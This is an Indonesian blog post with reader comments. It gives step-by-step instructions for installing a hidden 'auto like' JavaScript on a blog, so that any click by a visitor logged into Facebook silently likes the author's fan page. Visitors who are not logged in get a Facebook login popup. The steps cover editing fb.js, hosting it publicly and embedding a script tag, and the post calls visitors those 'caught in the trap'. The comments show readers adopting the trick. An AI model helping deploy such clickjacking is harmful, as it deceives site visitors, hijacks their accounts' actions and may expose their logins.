Cara Pasang Script Auto Like Fans Page Facebook di Blog

Adalah suatu kebanggaan tersendiri jika memiliki Facebook Fans Page dengan jumlah fans yang banyak. Bukan hanya jadi suatu kebanggaan namun fans yang banyak bisa juga mendatangkan keuntungan tersendiri, misalnya kita manfaatkan facebook fans page tersebut sebagai media promosi jasa atau barang. Bukan perkara yang mudah untuk mendatangkan fans jika kita tidak memiliki cara khusus, kecuali jika anda seorang public figur atau materi yang ada dalam fans page tersebut banyak diminati pengguna facebook.

Banyak jasa yang menawarkan Facebook Fans Page Topup (jasa penambahan fans page facebook) dengan harga yang bervariasi dan kebanyakan dari mereka menggunakan script auto like. Ternyata cara menggunakan script auto like ini cukup mudah syaratnya anda harus memiliki blog atau website, semakin banyak pengunjung di blog semakin banyak pula yang kena perangkap auto like ini.

Yang belum punya Fanpage Kesini >

Cara kerja script auto like :
  • Jika ada pengunjung blog anda dalam kondisi login facebook, maka secara otomatis akan me like asal dia malakukan klik dimanapun dalam blog anda.
  • jika ada pengunjung blog anda tidak dalam kondisi login facebook, ketika pengunjung tersebut melakukan klik dimanapun dalam blog anda, maka akan muncul popup halaman login facebook.
Cara memasang script auto like :
  1. Download file javascript autolike yang telah saya buat Disini atau Disana
  2. Extrack file Facebook_Autolike.rar kemudian buka file fb.js dengan text editor (Notepad++)
  3. Ubah bagian _URL_FANS_PAGE_FACEBOOK_  dengan url fans page facebook anda.
  4. Buka http://yourjavascript.com
  5. Masukan file fb.js yang telah anda edit
  6. Sebaiknya jangan centang pilihan (check box) make private supaya anda bisa menempatkanya pada sembarang blog/domain.
  7. Masukan email anda dan klik upload.
  8. Tunggu beberapa saat sampai uploading selesai kemudian buka email anda.
  9. Jika berhasil anda akan mendapat email yang berisi link javascript.
  10. Masukan kode pemanggil javascript tersebut di website anda. ( ke Dasbor > Rancangan > Tambah Gadget )
cth kode nya : <script type="text/javascript" src="http://yourjavascript.com/11264476221/fb.js"></script>






Tolong Klik Iklan DIbawah Sebagai Tanda Terimakasih :)

Like THIS :
Share this article to: Facebook Twitter Google+ Linkedin Technorati Digg

Jika Anda menyukai Artikel di blog ini, Silahkan klik disini untuk berlangganan gratis via email, dengan begitu Anda akan mendapat kiriman artikel setiap ada artikel yang terbit di Myhafiezers

22 komentar untuk "Cara Pasang Script Auto Like Fans Page Facebook di Blog"

  1. Makasih infonya...

    ( By: baru bljr ngblog )

    BalasHapus
  2. wah, cocok nih, ijin praktek gan

    BalasHapus
  3. thanks sobat udah berbagi. salam kenal :)

    BalasHapus
  4. gan,, auto like in fanspage gua donk ntar gua bayar !!!
    Inbox fb me
    syahrul.ramadhani73@yahoo.com

    BalasHapus
  5. Mas saya kan punya 4 fans page, kalo saya pasang 4-4nya 4 fans page aku di like otomatis juga nggak mas. ?
    tolong di bales ya mas :)

    BalasHapus
  6. @ISLANKUDOTCOMg bsa , eror nanti jadinya , pake 1 fp aja

    BalasHapus
  7. Koq nggak bisa si mas?
    coba tengngok islankudotcom.

    BalasHapus
  8. makasih... cara pasang scriptnya...

    BalasHapus
  9. dicoba-dicoba gan. trima kasih.

    BalasHapus
  10. Terima kasih sekali infonya... sudah sy praktekkan. tinggal lihat hasilnya.. mudah2an berhasil.. :)

    Saya lagi buat Blog krn tugas kuliah...

    Mohon mampir: whatskpop.blogspot.com

    Kalo bisa like jg fanpage fb nya, follow twitter, add jg google plus...

    Plisssssssssssssssssssss

    Thx before

    BalasHapus
  11. kalo like boxnya dipasang juga ngaruh ngga gan?

    BalasHapus
  12. http://fotonabilajkt48.blogspot.com/

    kalo ada iklannya, dan ngklik iklan, itu ngelike ngga gan? kaya web saya yang diatas

    BalasHapus
  13. bang tolong donk pasangin Fanspage facebook aku :(
    cuma 1 FP kok :(
    nanti aku bayar deh :)

    inbox me ya d facebook : Yura chika sisiwonest (cari aja pasti ketemu)

    tolong ya gan..penting banget :'(

    BalasHapus

- Tolong Berkomentar Sesuai Dengan Isi Postingan
- Tolong Jangan Memasukkan Link Ke Dalam Komentar
- Yang Berkomentar Pasti Akan Mendapatkan kunjungan Balik Dari Saya
- Jangan Lupa Follow Ya 'Ntar Di FollBack Kok
- Saya Minta Maaf Karena Tidak Bisa Membalas Komentar Anda , Karena Saya Sangat Sibuk